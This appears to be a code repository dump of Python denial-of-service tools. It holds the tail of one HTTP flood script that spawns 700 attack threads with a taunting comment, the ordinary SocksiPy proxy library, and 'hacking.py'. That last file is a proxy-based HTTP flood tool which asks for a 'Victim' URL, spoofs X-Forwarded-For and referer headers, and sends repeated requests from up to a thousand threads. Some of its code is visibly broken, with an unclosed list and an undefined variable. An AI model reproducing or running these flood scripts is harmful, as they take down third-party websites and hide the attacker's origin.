sys.argv[1] 242 | if url.count("/")==2: 243 | url = url + "/" 244 | m = re.search('http\://([^/]*)/?.*', url) 245 | host = m.group(1) 246 | for i in range(700): 247 | t = HTTPThread() 248 | t.start() 249 | t = MonitorThread() 250 | t.start() 251 | 252 | ####################################-> 253 | #4312644bf54db17180c8a95add9fdc06####-->uauauauauauauau 254 | #9dfb17e500b557a9d985c08da4fd0aaf#####--->We will fuck your site D: 255 | #5afc3c0f68ff47b53b485fcd53e898a9######---->SadAttack :( 256 | #ff46a6b3100d11c29d4233c72f604a10#####--->uauauauauauau 257 | #6e70e3b1bf171ae14505f4f8b0dc4e5a####--> 258 | ####################################-> 259 | -------------------------------------------------------------------------------- /socks.py: -------------------------------------------------------------------------------- 1 | """SocksiPy - Python SOCKS module. 2 | Version 1.00 3 | 4 | Copyright 2006 Dan-Haim. All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without modification, 7 | are permitted provided that the following conditions are met: 8 | 1. Redistributions of source code must retain the above copyright notice, this 9 | list of conditions and the following disclaimer. 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation 12 | and/or other materials provided with the distribution. 13 | 3. Neither the name of Dan Haim nor the names of his contributors may be used 14 | to endorse or promote products derived from this software without specific 15 | prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED 18 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 19 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO 20 | EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 21 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 22 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA 23 | OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT 25 | OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE. 26 | 27 | 28 | This module provides a standard socket-like interface for Python 29 | for tunneling connections through SOCKS proxies. 30 | 31 | """ 32 | 33 | import socket 34 | import struct 35 | 36 | PROXY_TYPE_SOCKS4 = 1 37 | PROXY_TYPE_SOCKS5 = 2 38 | PROXY_TYPE_HTTP = 3 39 | 40 | _defaultproxy = None 41 | _orgsocket = socket.socket 42 | 43 | class ProxyError(Exception): 44 | def __init__(self, value): 45 | self.value = value 46 | def __str__(self): 47 | return repr(self.value) 48 | 49 | class GeneralProxyError(ProxyError): 50 | def __init__(self, value): 51 | self.value = value 52 | def __str__(self): 53 | return repr(self.value) 54 | 55 | class Socks5AuthError(ProxyError): 56 | def __init__(self, value): 57 | self.value = value 58 | def __str__(self): 59 | return repr(self.value) 60 | 61 | class Socks5Error(ProxyError): 62 | def __init__(self, value): 63 | self.value = value 64 | def __str__(self): 65 | return repr(self.value) 66 | 67 | class Socks4Error(ProxyError): 68 | def __init__(self, value): 69 | self.value = value 70 | def __str__(self): 71 | return repr(self.value) 72 | 73 | class HTTPError(ProxyError): 74 | def __init__(self, value): 75 | self.value = value 76 | def __str__(self): 77 | return repr(self.value) 78 | 79 | _generalerrors = ("success", 80 | "invalid data", 81 | "not connected", 82 | "not available", 83 | "bad proxy type", 84 | "bad input") 85 | 86 | _socks5errors = ("succeeded", 87 | "general SOCKS server failure", 88 | "connection not allowed by ruleset", 89 | "Network unreachable", 90 | "Host unreachable", 91 | "Connection refused", 92 | "TTL expired", 93 | "Command not supported", 94 | "Address type not supported", 95 | "Unknown error") 96 | 97 | _socks5autherrors = ("succeeded", 98 | "authentication is required", 99 | "all offered authentication methods were rejected", 100 | "unknown username or invalid password", 101 | "unknown error") 102 | 103 | _socks4errors = ("request granted", 104 | "request rejected or failed", 105 | "request rejected because SOCKS server cannot connect to identd on the client", 106 | "request rejected because the client program and identd report different user-ids", 107 | "unknown error") 108 | 109 | def setdefaultproxy(proxytype=None,addr=None,port=None,rdns=True,username=None,password=None): 110 | """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) 111 | Sets a default proxy which all further socksocket objects will use, 112 | unless explicitly changed. 113 | """ 114 | global _defaultproxy 115 | _defaultproxy = (proxytype,addr,port,rdns,username,password) 116 | 117 | class socksocket(socket.socket): 118 | """socksocket([family[, type[, proto]]]) -> socket object 119 | 120 | Open a SOCKS enabled socket. The parameters are the same as 121 | those of the standard socket init. In order for SOCKS to work, 122 | you must specify family=AF_INET, type=SOCK_STREAM and proto=0. 123 | """ 124 | 125 | def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None): 126 | _orgsocket.__init__(self,family,type,proto,_sock) 127 | if _defaultproxy != None: 128 | self.__proxy = _defaultproxy 129 | else: 130 | self.__proxy = (None, None, None, None, None, None) 131 | self.__proxysockname = None 132 | self.__proxypeername = None 133 | 134 | def __recvall(self, bytes): 135 | """__recvall(bytes) -> data 136 | Receive EXACTLY the number of bytes requested from the socket. 137 | Blocks until the required number of bytes have been received. 138 | """ 139 | data = "" 140 | while len(data) < bytes: 141 | data = data + self.recv(bytes-len(data)) 142 | return data 143 | 144 | def setproxy(self,proxytype=None,addr=None,port=None,rdns=True,username=None,password=None): 145 | """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) 146 | Sets the proxy to be used. 147 | proxytype - The type of the proxy to be used. Three types 148 | are supported: PROXY_TYPE_SOCKS4 (including socks4a), 149 | PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP 150 | addr - The address of the server (IP or DNS). 151 | port - The port of the server. Defaults to 1080 for SOCKS 152 | servers and 8080 for HTTP proxy servers. 153 | rdns - Should DNS queries be preformed on the remote side 154 | (rather than the local side). The default is True. 155 | Note: This has no effect with SOCKS4 servers. 156 | username - Username to authenticate with to the server. 157 | The default is no authentication. 158 | password - Password to authenticate with to the server. 159 | Only relevant when username is also provided. 160 | """ 161 | self.__proxy = (proxytype,addr,port,rdns,username,password) 162 | 163 | def __negotiatesocks5(self,destaddr,destport): 164 | """__negotiatesocks5(self,destaddr,destport) 165 | Negotiates a connection through a SOCKS5 server. 166 | """ 167 | # First we'll send the authentication packages we support. 168 | if (self.__proxy[4]!=None) and (self.__proxy[5]!=None): 169 | # The username/password details were supplied to the 170 | # setproxy method so we support the USERNAME/PASSWORD 171 | # authentication (in addition to the standard none). 172 | self.sendall("\x05\x02\x00\x02") 173 | else: 174 | # No username/password were entered, therefore we 175 | # only support connections with no authentication. 176 | self.sendall("\x05\x01\x00") 177 | # We'll receive the server's response to determine which 178 | # method was selected 179 | chosenauth = self.__recvall(2) 180 | if chosenauth[0] != "\x05": 181 | self.close() 182 | raise GeneralProxyError((1,_generalerrors[1])) 183 | # Check the chosen authentication method 184 | if chosenauth[1] == "\x00": 185 | # No authentication is required 186 | pass 187 | elif chosenauth[1] == "\x02": 188 | # Okay, we need to perform a basic username/password 189 | # authentication. 190 | self.sendall("\x01" + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.proxy[5])) + self.__proxy[5]) 191 | authstat = self.__recvall(2) 192 | if authstat[0] != "\x01": 193 | # Bad response 194 | self.close() 195 | raise GeneralProxyError((1,_generalerrors[1])) 196 | if authstat[1] != "\x00": 197 | # Authentication failed 198 | self.close() 199 | raise Socks5AuthError,((3,_socks5autherrors[3])) 200 | # Authentication succeeded 201 | else: 202 | # Reaching here is always bad 203 | self.close() 204 | if chosenauth[1] == "\xFF": 205 | raise Socks5AuthError((2,_socks5autherrors[2])) 206 | else: 207 | raise GeneralProxyError((1,_generalerrors[1])) 208 | # Now we can request the actual connection 209 | req = "\x05\x01\x00" 210 | # If the given destination address is an IP address, we'll 211 | # use the IPv4 address request even if remote resolving was specified. 212 | try: 213 | ipaddr = socket.inet_aton(destaddr) 214 | req = req + "\x01" + ipaddr 215 | except socket.error: 216 | # Well it's not an IP number, so it's probably a DNS name. 217 | if self.__proxy[3]==True: 218 | # Resolve remotely 219 | ipaddr = None 220 | req = req + "\x03" + chr(len(destaddr)) + destaddr 221 | else: 222 | # Resolve locally 223 | ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) 224 | req = req + "\x01" + ipaddr 225 | req = req + struct.pack(">H",destport) 226 | self.sendall(req) 227 | # Get the response 228 | resp = self.__recvall(4) 229 | if resp[0] != "\x05": 230 | self.close() 231 | raise GeneralProxyError((1,_generalerrors[1])) 232 | elif resp[1] != "\x00": 233 | # Connection failed 234 | self.close() 235 | if ord(resp[1])<=8: 236 | raise Socks5Error(ord(resp[1]),_generalerrors[ord(resp[1])]) 237 | else: 238 | raise Socks5Error(9,_generalerrors[9]) 239 | # Get the bound address/port 240 | elif resp[3] == "\x01": 241 | boundaddr = self.__recvall(4) 242 | elif resp[3] == "\x03": 243 | resp = resp + self.recv(1) 244 | boundaddr = self.__recvall(resp[4]) 245 | else: 246 | self.close() 247 | raise GeneralProxyError((1,_generalerrors[1])) 248 | boundport = struct.unpack(">H",self.__recvall(2))[0] 249 | self.__proxysockname = (boundaddr,boundport) 250 | if ipaddr != None: 251 | self.__proxypeername = (socket.inet_ntoa(ipaddr),destport) 252 | else: 253 | self.__proxypeername = (destaddr,destport) 254 | 255 | def getproxysockname(self): 256 | """getsockname() -> address info 257 | Returns the bound IP address and port number at the proxy. 258 | """ 259 | return self.__proxysockname 260 | 261 | def getproxypeername(self): 262 | """getproxypeername() -> address info 263 | Returns the IP and port number of the proxy. 264 | """ 265 | return _orgsocket.getpeername(self) 266 | 267 | def getpeername(self): 268 | """getpeername() -> address info 269 | Returns the IP address and port number of the destination 270 | machine (note: getproxypeername returns the proxy) 271 | """ 272 | return self.__proxypeername 273 | 274 | def __negotiatesocks4(self,destaddr,destport): 275 | """__negotiatesocks4(self,destaddr,destport) 276 | Negotiates a connection through a SOCKS4 server. 277 | """ 278 | # Check if the destination address provided is an IP address 279 | rmtrslv = False 280 | try: 281 | ipaddr = socket.inet_aton(destaddr) 282 | except socket.error: 283 | # It's a DNS name. Check where it should be resolved. 284 | if self.__proxy[3]==True: 285 | ipaddr = "\x00\x00\x00\x01" 286 | rmtrslv = True 287 | else: 288 | ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) 289 | # Construct the request packet 290 | req = "\x04\x01" + struct.pack(">H",destport) + ipaddr 291 | # The username parameter is considered userid for SOCKS4 292 | if self.__proxy[4] != None: 293 | req = req + self.__proxy[4] 294 | req = req + "\x00" 295 | # DNS name if remote resolving is required 296 | # NOTE: This is actually an extension to the SOCKS4 protocol 297 | # called SOCKS4A and may not be supported in all cases. 298 | if rmtrslv==True: 299 | req = req + destaddr + "\x00" 300 | self.sendall(req) 301 | # Get the response from the server 302 | resp = self.__recvall(8) 303 | if resp[0] != "\x00": 304 | # Bad data 305 | self.close() 306 | raise GeneralProxyError((1,_generalerrors[1])) 307 | if resp[1] != "\x5A": 308 | # Server returned an error 309 | self.close() 310 | if ord(resp[1]) in (91,92,93): 311 | self.close() 312 | raise Socks4Error((ord(resp[1]),_socks4errors[ord(resp[1])-90])) 313 | else: 314 | raise Socks4Error((94,_socks4errors[4])) 315 | # Get the bound address/port 316 | self.__proxysockname = (socket.inet_ntoa(resp[4:]),struct.unpack(">H",resp[2:4])[0]) 317 | if rmtrslv != None: 318 | self.__proxypeername = (socket.inet_ntoa(ipaddr),destport) 319 | else: 320 | self.__proxypeername = (destaddr,destport) 321 | 322 | def __negotiatehttp(self,destaddr,destport): 323 | """__negotiatehttp(self,destaddr,destport) 324 | Negotiates a connection through an HTTP server. 325 | """ 326 | # If we need to resolve locally, we do this now 327 | if self.__proxy[3] == False: 328 | addr = socket.gethostbyname(destaddr) 329 | else: 330 | addr = destaddr 331 | self.sendall("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n") 332 | # We read the response until we get the string "\r\n\r\n" 333 | resp = self.recv(1) 334 | while resp.find("\r\n\r\n")==-1: 335 | resp = resp + self.recv(1) 336 | # We just need the first line to check if the connection 337 | # was successful 338 | statusline = resp.splitlines()[0].split(" ",2) 339 | if statusline[0] not in ("HTTP/1.0","HTTP/1.1"): 340 | self.close() 341 | raise GeneralProxyError((1,_generalerrors[1])) 342 | try: 343 | statuscode = int(statusline[1]) 344 | except ValueError: 345 | self.close() 346 | raise GeneralProxyError((1,_generalerrors[1])) 347 | if statuscode != 200: 348 | self.close() 349 | raise HTTPError((statuscode,statusline[2])) 350 | self.__proxysockname = ("0.0.0.0",0) 351 | self.__proxypeername = (addr,destport) 352 | 353 | def connect(self,destpair): 354 | """connect(self,despair) 355 | Connects to the specified destination through a proxy. 356 | destpar - A tuple of the IP/DNS address and the port number. 357 | (identical to socket's connect). 358 | To select the proxy server use setproxy(). 359 | """ 360 | # Do a minimal input check first 361 | if (type(destpair) in (list,tuple)==False) or (len(destpair)<2) or (type(destpair[0])!=str) or (type(destpair[1])!=int): 362 | raise GeneralProxyError((5,_generalerrors[5])) 363 | if self.__proxy[0] == PROXY_TYPE_SOCKS5: 364 | if self.__proxy[2] != None: 365 | portnum = self.__proxy[2] 366 | else: 367 | portnum = 1080 368 | _orgsocket.connect(self,(self.__proxy[1],portnum)) 369 | self.__negotiatesocks5(destpair[0],destpair[1]) 370 | elif self.__proxy[0] == PROXY_TYPE_SOCKS4: 371 | if self.__proxy[2] != None: 372 | portnum = self.__proxy[2] 373 | else: 374 | portnum = 1080 375 | _orgsocket.connect(self,(self.__proxy[1],portnum)) 376 | self.__negotiatesocks4(destpair[0],destpair[1]) 377 | elif self.__proxy[0] == PROXY_TYPE_HTTP: 378 | if self.__proxy[2] != None: 379 | portnum = self.__proxy[2] 380 | else: 381 | portnum = 8080 382 | _orgsocket.connect(self,(self.__proxy[1],portnum)) 383 | self.__negotiatehttp(destpair[0],destpair[1]) 384 | elif self.__proxy[0] == None: 385 | _orgsocket.connect(self,(destpair[0],destpair[1])) 386 | else: 387 | raise GeneralProxyError((4,_generalerrors[4])) 388 | -------------------------------------------------------------------------------- /hacking.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | userAgents = [ 9 | 10 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 11 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 12 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 13 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 14 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 15 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 16 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 17 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 18 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 19 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 20 | 21 | 22 | # referers 23 | def referer_list(): 24 | global headers_referers 25 | headers_referers.append('http://www.google.com/?q=') 26 | headers_referers.append('http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..') 27 | headers_referers.append('http://vk.com/profile.php?redirect=') 28 | headers_referers.append('http://www.usatoday.com/search/results?q=') 29 | headers_referers.append('http://engadget.search.aol.com/search?q=query?=query=..') 30 | headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882') 31 | headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925') 32 | headers_referers.append('http://yandex.ru/yandsearch?text=') 33 | headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832') 34 | headers_referers.append('http://go.mail.ru/search?mail.ru=1&q=') 35 | headers_referers.append('http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..') 36 | headers_referers.append('http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..') 37 | headers_referers.append('http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..') 38 | headers_referers.append('http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..') 39 | headers_referers.append('http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..') 40 | headers_referers.append('/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882') 41 | headers_referers.append('http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..') 42 | headers_referers.append('http://www.google.ru/url?sa=t&rct=?j&q=&e..') 43 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 44 | #bing 45 | headers_referers.append('http://www.bing.com/search?q=') 46 | headers_referers.append('https://www.yandex.com/yandsearch?text=') 47 | headers_referers.append('https://duckduckgo.com/?q=') 48 | headers_referers.append('http://www.ask.com/web?q=') 49 | headers_referers.append('http://search.aol.com/aol/search?q=') 50 | headers_referers.append('https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=') 51 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 52 | headers_referers.append('http://validator.w3.org/feed/check.cgi?url=') 53 | headers_referers.append('http://host-tracker.com/check_page/?furl=') 54 | headers_referers.append('http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=') 55 | headers_referers.append('http://jigsaw.w3.org/css-validator/validator?uri=') 56 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 57 | headers_referers.append('http://www.google.com/?q=') 58 | headers_referers.append('http://www.google.com/?q=') 59 | headers_referers.append('http://www.google.com/?q=') 60 | headers_referers.append('http://www.usatoday.com/search/results?q=') 61 | headers_referers.append('http://engadget.search.aol.com/search?q=') 62 | headers_referers.append('https://steamcommunity.com/market/search?q=') 63 | headers_referers.append('http://filehippo.com/search?q=') 64 | headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=') 65 | headers_referers.append('http://eu.battle.net/wow/en/search?q=') 66 | headers_referers.append('http://engadget.search.aol.com/search?q=') 67 | headers_referers.append('http://careers.gatesfoundation.org/search?q=') 68 | headers_referers.append('http://techtv.mit.edu/search?q=') 69 | headers_referers.append('http://www.ustream.tv/search?q=') 70 | headers_referers.append('http://www.ted.com/search?q=') 71 | headers_referers.append('http://funnymama.com/search?q=') 72 | headers_referers.append('http://itch.io/search?q=') 73 | headers_referers.append('http://jobs.rbs.com/jobs/search?q=') 74 | headers_referers.append('http://taginfo.openstreetmap.org/search?q=') 75 | headers_referers.append('http://www.baoxaydung.com.vn/news/vn/search&q=') 76 | headers_referers.append('https://play.google.com/store/search?q=') 77 | headers_referers.append('http://www.tceq.texas.gov/@@tceq-search?q=') 78 | headers_referers.append('http://www.reddit.com/search?q=') 79 | headers_referers.append('http://www.bestbuytheater.com/events/search?q=') 80 | headers_referers.append('https://careers.carolinashealthcare.org/search?q=') 81 | headers_referers.append('http://jobs.leidos.com/search?q=') 82 | headers_referers.append('http://jobs.bloomberg.com/search?q=') 83 | headers_referers.append('https://www.pinterest.com/search/?q=') 84 | headers_referers.append('http://millercenter.org/search?q=') 85 | headers_referers.append('https://www.npmjs.com/search?q=') 86 | headers_referers.append('http://www.evidence.nhs.uk/search?q=') 87 | headers_referers.append('http://www.shodanhq.com/search?q=') 88 | headers_referers.append('http://ytmnd.com/search?q=') 89 | headers_referers.append('http://www.google.com/?q=') 90 | headers_referers.append('http://www.google.com/?q=') 91 | headers_referers.append('http://www.google.com/?q=') 92 | headers_referers.append('http://www.usatoday.com/search/results?q=') 93 | headers_referers.append('http://engadget.search.aol.com/search?q=') 94 | headers_referers.append('https://steamcommunity.com/market/search?q=') 95 | headers_referers.append('http://filehippo.com/search?q=') 96 | headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=') 97 | headers_referers.append('http://eu.battle.net/wow/en/search?q=') 98 | headers_referers.append('http://engadget.search.aol.com/search?q=') 99 | headers_referers.append('http://careers.gatesfoundation.org/search?q=') 100 | headers_referers.append('http://techtv.mit.edu/search?q=') 101 | headers_referers.append('http://www.ustream.tv/search?q=') 102 | headers_referers.append('http://www.ted.com/search?q=') 103 | headers_referers.append('http://funnymama.com/search?q=') 104 | headers_referers.append('http://itch.io/search?q=') 105 | headers_referers.append('http://jobs.rbs.com/jobs/search?q=') 106 | headers_referers.append('http://taginfo.openstreetmap.org/search?q=') 107 | headers_referers.append('http://www.baoxaydung.com.vn/news/vn/search&q=') 108 | headers_referers.append('https://play.google.com/store/search?q=') 109 | headers_referers.append('http://www.tceq.texas.gov/@@tceq-search?q=') 110 | headers_referers.append('http://www.reddit.com/search?q=') 111 | headers_referers.append('http://www.bestbuytheater.com/events/search?q=') 112 | headers_referers.append('https://careers.carolinashealthcare.org/search?q=') 113 | headers_referers.append('http://jobs.leidos.com/search?q=') 114 | headers_referers.append('http://jobs.bloomberg.com/search?q=') 115 | headers_referers.append('https://www.pinterest.com/search/?q=') 116 | headers_referers.append('http://millercenter.org/search?q=') 117 | headers_referers.append('https://www.npmjs.com/search?q=') 118 | headers_referers.append('http://www.evidence.nhs.uk/search?q=') 119 | headers_referers.append('http://www.shodanhq.com/search?q=') 120 | headers_referers.append('http://ytmnd.com/search?q=') 121 | headers_referers.append('http://www.google.com/?q=') 122 | headers_referers.append('http://www.google.com/?q=') 123 | headers_referers.append('http://www.google.com/?q=') 124 | headers_referers.append('http://www.usatoday.com/search/results?q=') 125 | headers_referers.append('http://engadget.search.aol.com/search?q=') 126 | headers_referers.append('https://steamcommunity.com/market/search?q=') 127 | headers_referers.append('http://filehippo.com/search?q=') 128 | headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=') 129 | headers_referers.append('http://eu.battle.net/wow/en/search?q=') 130 | headers_referers.append('http://engadget.search.aol.com/search?q=') 131 | headers_referers.append('http://careers.gatesfoundation.org/search?q=') 132 | headers_referers.append('http://techtv.mit.edu/search?q=') 133 | headers_referers.append('http://www.ustream.tv/search?q=') 134 | headers_referers.append('http://www.ted.com/search?q=') 135 | headers_referers.append('http://funnymama.com/search?q=') 136 | headers_referers.append('http://itch.io/search?q=') 137 | headers_referers.append('http://jobs.rbs.com/jobs/search?q=') 138 | headers_referers.append('http://taginfo.openstreetmap.org/search?q=') 139 | headers_referers.append('http://www.baoxaydung.com.vn/news/vn/search&q=') 140 | headers_referers.append('https://play.google.com/store/search?q=') 141 | headers_referers.append('http://www.tceq.texas.gov/@@tceq-search?q=') 142 | headers_referers.append('http://www.reddit.com/search?q=') 143 | headers_referers.append('http://www.bestbuytheater.com/events/search?q=') 144 | headers_referers.append('https://careers.carolinashealthcare.org/search?q=') 145 | headers_referers.append('http://jobs.leidos.com/search?q=') 146 | headers_referers.append('http://jobs.bloomberg.com/search?q=') 147 | headers_referers.append('https://www.pinterest.com/search/?q=') 148 | headers_referers.append('http://millercenter.org/search?q=') 149 | headers_referers.append('https://www.npmjs.com/search?q=') 150 | headers_referers.append('http://www.evidence.nhs.uk/search?q=') 151 | headers_referers.append('http://www.shodanhq.com/search?q=') 152 | headers_referers.append('http://ytmnd.com/search?q=') 153 | headers_referers.append('http://www.google.com/?q=') 154 | headers_referers.append('http://www.google.com/?q=') 155 | headers_referers.append('http://www.google.com/?q=') 156 | headers_referers.append('http://www.usatoday.com/search/results?q=') 157 | headers_referers.append('http://engadget.search.aol.com/search?q=') 158 | headers_referers.append('https://steamcommunity.com/market/search?q=') 159 | headers_referers.append('http://filehippo.com/search?q=') 160 | headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=') 161 | headers_referers.append('http://eu.battle.net/wow/en/search?q=') 162 | headers_referers.append('http://engadget.search.aol.com/search?q=') 163 | headers_referers.append('http://careers.gatesfoundation.org/search?q=') 164 | headers_referers.append('http://techtv.mit.edu/search?q=') 165 | headers_referers.append('http://www.ustream.tv/search?q=') 166 | headers_referers.append('http://www.ted.com/search?q=') 167 | headers_referers.append('http://funnymama.com/search?q=') 168 | headers_referers.append('http://itch.io/search?q=') 169 | headers_referers.append('http://jobs.rbs.com/jobs/search?q=') 170 | headers_referers.append('http://taginfo.openstreetmap.org/search?q=') 171 | headers_referers.append('http://www.baoxaydung.com.vn/news/vn/search&q=') 172 | headers_referers.append('https://play.google.com/store/search?q=') 173 | headers_referers.append('http://www.tceq.texas.gov/@@tceq-search?q=') 174 | headers_referers.append('http://www.reddit.com/search?q=') 175 | headers_referers.append('http://www.bestbuytheater.com/events/search?q=') 176 | headers_referers.append('https://careers.carolinashealthcare.org/search?q=') 177 | headers_referers.append('http://jobs.leidos.com/search?q=') 178 | headers_referers.append('http://jobs.bloomberg.com/search?q=') 179 | headers_referers.append('https://www.pinterest.com/search/?q=') 180 | headers_referers.append('http://millercenter.org/search?q=') 181 | headers_referers.append('https://www.npmjs.com/search?q=') 182 | headers_referers.append('http://www.evidence.nhs.uk/search?q=') 183 | headers_referers.append('http://www.shodanhq.com/search?q=') 184 | headers_referers.append('http://ytmnd.com/search?q=') 185 | return(headers_referers) 186 | 187 | def randomIp(): 188 | random.seed() 189 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 190 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 191 | return result 192 | 193 | def randomIpList(): 194 | random.seed() 195 | res = "" 196 | for ip in xrange(random.randint(2, 8)): 197 | res = res + randomIp() + ", " 198 | return res[0:len(res) - 2] 199 | 200 | def randomUserAgent(): 201 | return random.choice(userAgents) 202 | 203 | def randomReFerer(): 204 | return random.choice(reFerers) 205 | 206 | class attacco(threading.Thread): 207 | def run(self): 208 | current = x 209 | 210 | if current < len(listaproxy): 211 | proxy = listaproxy[current].split(':') 212 | else: 213 | proxy = random.choice(listaproxy).split(':') 214 | 215 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 216 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 217 | referer = "Referer: "+ randomReFerer() + url + "?r="+ str(random.randint(1, 1000)) + "\r\n" 218 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 219 | 220 | while nload: 221 | time.sleep(1) 222 | 223 | while 1: 224 | try: 225 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 226 | a.connect((proxy[0], int(proxy[1]))) 227 | a.send(httprequest) 228 | try: 229 | for i in xrange(3): 230 | a.send(httprequest) 231 | except: 232 | tts = 1 233 | 234 | 235 | except: 236 | proxy = random.choice(listaproxy).split(':') 237 | 238 | 239 | 240 | #Main 241 | print(" .----. Ddos - Warning Team .----. ") 242 | print("»------(.:. Ddos/Dos With Proxy List.:.)------»") 243 | 244 | # Site 245 | url = raw_input("Victim: ") 246 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 247 | 248 | #Proxy 249 | in_file = open(raw_input("File proxy: "),"r") 250 | proxyf = in_file.read() 251 | in_file.close() 252 | 253 | listaproxy = proxyf.split('\n') 254 | #So luong 255 | thread = input("So luong (1000): ") 256 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 257 | accept = "Accept-Encoding: gzip, deflate\r\n" 258 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 259 | nload = 1 260 | x = 0 261 | 262 | for x in xrange(thread): 263 | attacco().start() 264 | time.sleep(0.003) 265 | print "Dang chuan bi luong Ddos " + str(x) + "!" 266 | print "Dang Bat Dau Tan Cong..." 267 | nload = 0 268 | while not nload: 269 | time.sleep(1) --------------------------------------------------------------------------------